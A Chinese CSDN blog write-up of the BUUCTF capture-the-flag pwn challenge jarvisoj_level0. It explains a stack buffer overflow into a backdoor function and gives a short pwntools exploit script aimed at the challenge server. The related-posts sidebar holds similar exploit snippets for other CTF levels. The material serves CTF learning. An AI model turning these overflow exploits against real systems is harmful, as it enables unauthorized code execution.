BUUCTF刷题之路-jarvisoj_level01

最新推荐文章于 2023-06-17 02:39:22 发布
最新推荐文章于 2023-06-17 02:39:22 发布
阅读量209 收藏
点赞数 2
分类专栏: pwn CTF 文章标签: python c++
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_30528603/article/details/130904238
版权
CTF 同时被 2 个专栏收录
26 篇文章 0 订阅
订阅专栏
pwn
23 篇文章 1 订阅
订阅专栏

直接IDA打开看主函数如下:

 跟进这个vulnerable_function函数:

 看到个read函数,而且能输入的最大字节数为512字节。而buf我们看到是128字节的限度,那应该是存在栈溢出的问题。而且我们直接看到有个后门函数,和前面几题的套路如出一辙。:

接下来我们验证开启了哪些保护:

还是熟悉的味道,直接构造exp:

from pwn import *
sh=remote('node4.buuoj.cn',25804)
buf2_addr =0x400596
sh.sendline(b'A'*136 + p64(buf2_addr))
sh.interactive()

 得到flag:

 

call就不要ret
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
alx-low_level_programming
02-10
总的来说,"alx-low_level_programming"的学习之旅将带你深入到计算机的内核,让你成为一名精通底层编程的专家。这不仅能够提升你的编程技巧,还能使你具备解决复杂系统问题的能力,无论是在系统优化、性能调试,...
holbertonschool-higher_level_programming:高级编程
04-10
高级编程 欢迎 以下脚本和项目是用Python3编写的。 目录 关于 该存储库包含用于高级编程的介绍性项目。 主题包括: 注释代码并遵循编码风格标准 变量,数据结构,运算符,表达式,循环,嵌套循环 ...
buuctf ---- jarvisoj_level(全)
L0g1c的博客
01-22 3529
buuctf ----- jarvisoj_level0 运行一下程序 使用64位的IDA查看程序 查看vulner_function函数 发现buf存在溢出漏洞,buf是0x80,read了0x200 存在栈溢出漏洞 发现后门函数system("/bin/sh"),解题思路:修改read函数的ret address 为后门函数的地址。 编写exp from pwn import* io=remote("node4.buuoj.cn",26034) sys_addr=0x0400596 pa
BUUCTF-----jarvisoj_level01
最新发布
qq_52333044的博客
06-17 142
发现 buf输入是0x80(136) 而read能输入最大字数是0x200(512),可能存在栈溢出漏洞,发现后门函数system("/bin/sh"),然后只要read函数的ret address 为后门函数的地址。然后就file 分析它得到是64位的IDA。查看vulner_function函数。
jarvis oj---level1解题方法
weixin_45427676的博客
09-29 469
题目场景 nc pwn2.jarvisoj.com 9877 level1.80eacdcd51aca92af7749d96efad7fb5 解题 在vm终端“checksec"查看一下保护机制 没有什么保护,用IDA打开文件 查看vulnerable_function()函数 可以看到栈溢出 我们没有看到system()函数,没有找到"/bin/sh",但是在vulnerable_funct...
铁人三项_第五赛区_2018_rop
z1r0的博客
12-05 143
铁人三项_第五赛区_2018_rop 查看保护 溢出,ret2libc from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27080) else: r = process(file_name) elf = ELF(file_name) def dbg(
[BUUCTF]PWN——jarvisoj_level1
mcmuyanga的博客
11-09 1513
jarvisoj_level1 附件 步骤: 例行检查,32位程序,没有开任何保护 本地运行一下程序,看看大概的情况,可以看到输出了一个地址 32位ida载入,习惯性的检索程序里的字符串,没有发现可以直接利用的gates, main函数开始看程序 function函数 参数buf存在明显的溢出漏洞,程序还将buf参数的地址给了我们 由于没有开启nx,所以我们可以先通过read读入shellcode,然后利用溢出漏洞将ret覆盖为buf参数地址(此时buf里是shellcode)去执行即可
grayValueDistributionCompare.rar_gray-level value_scale
07-13
"grayValueDistributionCompare.rar_gray-level value_scale"这个压缩包文件中的内容显然是围绕这一主题展开的。让我们深入探讨一下相关知识点。 1. **灰度值**(Gray Level):在数字图像中,每个像素被表示为一个...
Level_Set.zip_level set_level-set_set
07-15
这个"Level Set.zip_level set_level-set_set"压缩包文件包含了一个名为"Level_Set.m"的MATLAB程序,用于执行Level Set算法。 Level Set方法的核心思想是将图像中的边界或形状表示为一个零水平集(level set)函数...
five_level_final.rar_buck_buck-boost_converter_converter level_f
09-21
标题中的“five_level_final.rar_buck_buck-boost_converter_converter level_f”暗示了这是一个关于五电平直流到直流转换器的资源,特别是涉及到Buck-Buck-Boost转换器的电路设计或控制策略。Buck-Buck-Boost转换器...
jarvisoj_level0
zip471642048的博客
01-17 399
jarvisoj_level0 pwn的最简单的题目了,难的我是真不会了,说一下做题思路 首先拿到题目checksec检查一下开了什么东西 64位程序什么都没有开,太好了,开了东西就不会了~~。 ida64位查看shift+F12看一下,看到了、/bin/bash和system,然后就是Hello World 查看main函数 跟进vulnerable_function,很明显在这里发生溢出,buf的大小只有0x80但是缺接收了0x200导致溢出 gdb-peda调试程序,创建150用于溢出的字符串
jarvisoj_level1
m0sway的博客
12-03 2234
jarvisoj_level1 使用checksec查看: 保护全关,并且还有RWX区域。栈溢出的题目的话直接ret2shellcode即可。 放进IDA中查看: 主函数中直接给出漏洞函数: 妥妥的一个栈溢出了,程序会输出buf的地址。 查看了下字符串也没有关键字符串,看来就是ret2shellcode 然而…BUU上的环境可能有点问题。并不能打通。 于是…使用ret2libc的方式。用write泄露libc的地址,然后捣鼓捣鼓。 exp: from pwn import * from six imp
jarvisoj_level
m0_75234353的博客
05-09 139
这题和前面最大的不同就是x64,就意味着参数调用方式的不同。不再是像32位一样,把参数压入栈中。而是先压入指定寄存器,第七个以后的再按逆序压入栈。
[BUUCTF]PWN------jarvisoj_level0
BangSen1的博客
01-18 319
jarvisoj_level0 例行检查,64bit,开启NX保护。 nc一下,出现了Hello world,接着让我们输入,没有有用的信息。 ‘用IDA打开,看到了/bin/sh 双击跟进,Ctrl+x查看被什么调用,找到了后门,所以shell_addr=0x400596 查看主函数,寻找输入点。 可以看到buf的大小是0x80,但它读取时只读了0x20,可以溢出,覆盖返回地址为后门地址既可 exp flag ...
JarvisOJ-PWN-Level1
杀生丸?不,其实我要的是桔梗
03-16 832
JarvisOJ-PWN-Level 先checksec一下: 发现NX栈保护没有打开,也就是堆栈代码没有进行保护,那么就就题目很可能就是要输入shellcode在栈里执行吧。 打开IDA分析(32位): 主函数: vulner..fuction()函数: 题目的逻辑是打出buf的首地址然后写入从标准输入100字节给buf。 然后输出Holle world。 我们再看b...
Jarvis OJ level1题解
educat0r的博客
02-19 547
题目网址https://www.jarvisoj.com/challenges Pwn区level1题 首先把文件放入gdb中用checksec分析 分析发现,没有开启NX保护,说明文件内没有包含system(‘/bin/sh’),说明本题需要自己去构造shellcode。NX保护未开启表示着你输入的东西可执行,所以你需要构造shellcode填充数据,然后利用返回地址再次返回这个变量,就可以执...
jarvis oj level1
发蝴蝶和大脑斧的博客
12-01 335
还是先checksec Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x8048000) RWX: Has RWX segments 发现数据部分可以执行,先看ida,同样是vulnerable处有栈溢...
jarvis oj level0
发蝴蝶和大脑斧的博客
12-01 895
菜鸟入门,先从level0开始下手。 首先checksec,发现开启了nx保护。 Arch: amd64-64-little RELRO: No RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) 拖进64位ida,查看vulnerable_function ssize_t...
jarvisoj——[XMAN]level0
王嘟嘟的博客
07-14 344
题目 Wp 拿下来之后发现是一个64位的,直接开ida main函数,现在对main函数已经很熟悉了 这里看到一个方法 这里按照规则覆盖即可。 脚本 from pwn import * sh=remote("pwn2.jarvisoj.com","9881") data="A"*136+p64(0x400596) sh.sendline(data) sh.interactive() sh.close() ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值